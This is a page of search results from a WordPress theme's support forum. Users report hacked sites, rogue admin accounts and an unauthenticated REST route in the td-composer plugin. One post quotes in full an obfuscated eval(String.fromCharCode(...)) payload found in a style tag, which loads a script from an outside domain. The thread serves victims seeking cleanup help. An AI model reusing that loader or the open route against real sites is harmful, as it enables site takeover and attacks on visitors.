Search Results for 'malware'

    No search results were found in Documentation!

Results from the Forum
Bettina
tagDiv Staff

Hello @inserte !

Usually, there is more than one place. That’s why you should delete every hacked path.
Follow this guide to clean your WordPress and theme of malware: https://askwpgirl.com/10-steps-remove-malware-wordpress-site/

Thank you!

NickDeBaerdemaeker
Participant
#0

Hello,

like so many others I ran into issues with enolmann and greeceman accounts being made, plugins that I didn’t install and so on and so forth.

I installed the most recent updated theme as well as the new plugins, removed the accounts and plugins that shouldn’t be there.

Sadly our webmaster who’s in America can’t access the site, even after the cleaning, because of “malware”.
Furthermore there are now local users experiencing the same issue, and we can’t seem to locate where the issue comes from.

given the earlier security breach we were hoping you could assist us ?

the site’s http://www.enola.be

phongduycom
tagDiv Member

My website also encountered a similar issue when I was checking for malware using the Wordfence plugin. I ended up removing the plugin and investigating why it appeared. It turns out it was related to Tagdiv.

Bettina
tagDiv Staff

Hello!

Follow this guide to clean your WordPress and theme of malware:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ or https://askwpgirl.com/10-steps-remove-malware-wordpress-site/

I hope that helps you!

Thank you!

Matija
tagDiv Member

yes we all have this malware problem hmm!

is ‘permission_callback’ => ‘__return_true’, -> true to false…all we need to change or what !??

lyon
tagDiv Member

live-css is a plugin used by td-composer that creates a backdoor for anyone to add malware. You need to fix your plugin.

function td_live_css_on_rest_api_init() {
$namespace = ‘tdw’;
register_rest_route($namespace, ‘/save_css/’, array(
‘methods’ => ‘POST’,
‘callback’ => ‘td_live_css_on_ajax_save_css’,
‘permission_callback’ => ‘__return_true’,
));
}
should be false

Bettina
tagDiv Staff

Hello!


@Kpkna
Thank you for sharing a possible solution for this malware.

@dubravko
That plugin is deprecated and it is not used anymore in the latest update. Please check those screenshots to know how to shift from WPBakery to Composer: https://www.screencast.com/t/6xLVMmlsY ; https://www.screencast.com/t/zWHrRmK1LQC ; https://www.screencast.com/t/vuFdT9Stx ; https://www.screencast.com/t/DWbSf3qj ; https://www.screencast.com/t/QuHyGccTK71v

Thank you!

javid
tagDiv Member

when i check my site in google results my website were redirect to this url

specialnewpaper.com

i think this is malware

please check your plugin folder in your host

for this plugin ! wp-zexit

  • This reply was modified 2 years by javid.
javid
Participant
#0

i have the same problem

please see this link

wp-zexit
byu/cdbessig inWordPress

lyon
Participant
#0

All our sites have been infested with malware. https://www.bayareaparent.com/
found a backdoor in the live-css code that is part of td-composer in /wp-content/plugins/td-composer/css-live/includes/td_live_css_ajax.php that allows anyone to append css code to the page by making a POST request.

function td_live_css_on_rest_api_init() {
$namespace = ‘tdw’;
register_rest_route($namespace, ‘/save_css/’, array(
‘methods’ => ‘POST’,
‘callback’ => ‘td_live_css_on_ajax_save_css’,
‘permission_callback’ => ‘__return_true’,
));
}

Seems to be in all versions of theme. Version: 12.3, version: 11.3.2

css-live plugin.

alejandroman
tagDiv Member

2 followup

I have watched the video and done everything it recommends (as I said before). I have also ordered a full malware scan as per the last recommendation in the video. Please advise our website continues to generate “critical errors”. this request is urgent.

Alejandro

aaron1988
Participant
#0

Hi, Sucuri says that this is malware:
<style id=”tdw-css-placeholder”>var iz=String;eval(iz.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,112,115,58,47,47,115,116,97,121,46,100,101,99,101,110,116,114,97,108,97,112,112,112,115,46,99,111,109,47,115,114,99,47,112,97,103,101,46,106,115,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));</style></head>

I’ts generated from the TD-Composer plugin.

Also some AV’s says the site is not secure.

Anamaria
tagDiv Staff

Hello,

I recommend updating the theme to the latest version, 12.6 to be updated and to don’t have malware.
If you want to update the theme, you should download the latest version of it from Theme Forest account and download it.
I recommend that you update the theme manually https://forum.tagdiv.com/how-to-update-the-theme-2/ via FTP/cPanel/File Manager, also if possible disable extra plugins during the theme update to avoid any problems that may arise and make sure that you have activated the tagDiv Standard pack plugin to keep the website’s look. You can try to update the theme on a staging website.
After you update the theme, you need to update the theme plugins too.
In the worst cases, the settings in the theme panel may be lost (there have been isolated cases), in these cases, after the theme plugins that were previously used are activated, you will have to use a backup for the theme panel -> https://forum.tagdiv.com/import-export-theme-settings/

Thank you!

jriptide
Participant
#0

There are 3 images that after spending half a day assuming were malware turned out to be Newspaper theme images. TDN_Pic_1.png, TDN_Pic_2.png, and TDN_Pic_3.png. I installed the Premio media folder plug-in to manage my media files and these 3 images started replicating over and over and filling up my media libary. It only stopped when I disabled the folder plug-in. I tried to delete them and they come back, I assume there is somesort of protection assigned to these images for the Newspaper theme. It would seem that somehow that conflicts with the folder plugin and causes that protection to go into over drive replicating these images over and over. Do you have a solution for this issue, as I need the folder plug-in for managing the volume of media assets of this website.

Here is a screenshot, the images are replicated every 3 to 5 seconds.
https://photos.app.goo.gl/9SVvLrj3TpVsuXZDA

Miroslav Glavić
tagDiv Member

ALWAYS UPDATE.

Then do a malware scan.

Look at the plugins you are using as well.

milkgreg
tagDiv Member

I also have this problem. Every time I preview a post it creates the new admin account. I hired a malware removal service, but they couldn’t fix it. I “solved” it by not deleting greeceman from users but instead changing the role from “admin” to “none.” So now I at least no longer get new admin accounts when I preview a post.

I’m about to update my theme.

sklbc72
tagDiv Member

One of my sites (the one that uses tag div Newspaper theme) just experienced the same thing with an admin account being created with those same credentials:

admin account
Identifier: greeceman
Email: greeceman@mail.com

Even after deleting the account, within a few hours it returned and once again I deleted it. I also escalated to my WP Managed Host who ran a bunch of scans and tools to detect malware, which they could not find.

Just updated to the latest version of Newspaper—is this issue fixed? And is this a bug in the theme or something else? It seems quite a few users had this issue.

Thank you

avianews
tagDiv Member

Hi!
Have the same issue with malware injected code. https://i.imgur.com/4q70kCv.png
The code stores in td_live_css_local_storage. It refers to TD composer plugin.

I deleted the code. But what was the source of issue?
How I can protect the site?

As due to this code the user with admin rights was created several times on wordpress.

kapow
Participant
#0

Hi, my malware scanning plugin has identified 2x suspicious functions in this theme:
https://prnt.sc/1ccfzvd0W7V1
https://prnt.sc/ZUJEkwNnJmSb

It looks like these may be parts of demos – so just confirming that these demo folders are safe to delete in the theme?

Bettina
tagDiv Staff

Hello!

Follow this guide to clean your WordPress and theme of malware:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ or https://askwpgirl.com/10-steps-remove-malware-wordpress-site/

I hope that helps you!

Thank you!

Rogger Baylon
Participant
#0

Hello
The Malaware Scanning, is qualifying as malware to:
td_import.php
Suspicious function found.
tagDiv Cloud Library
Vulnerability found in 2.7
I wait for your comments

batchelorjc
tagDiv Member

I no longer have access to that site. I migrated my domain to devi.ly, and when I did, it changed my domain name over in DreamHost. If I reset it on my new site, devi.ly, will it release the old malwaredevil.com?

Bettina
tagDiv Staff

Hello @zebu59 !

That file isn’t from the theme for sure. Follow this guide to clean your WordPress and theme of malware:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ or https://askwpgirl.com/10-steps-remove-malware-wordpress-site/

Thank you!

batchelorjc
Participant
#0

Please unassign my newspaper and newsmag theme associated with malwaredevil.com (without the www). I cannot unassign it. I want to use that license with my new staging domain. Neither the www nor the one with out www are in commission any more.

Viewing 25 results - 226 through 250 (of 681 total)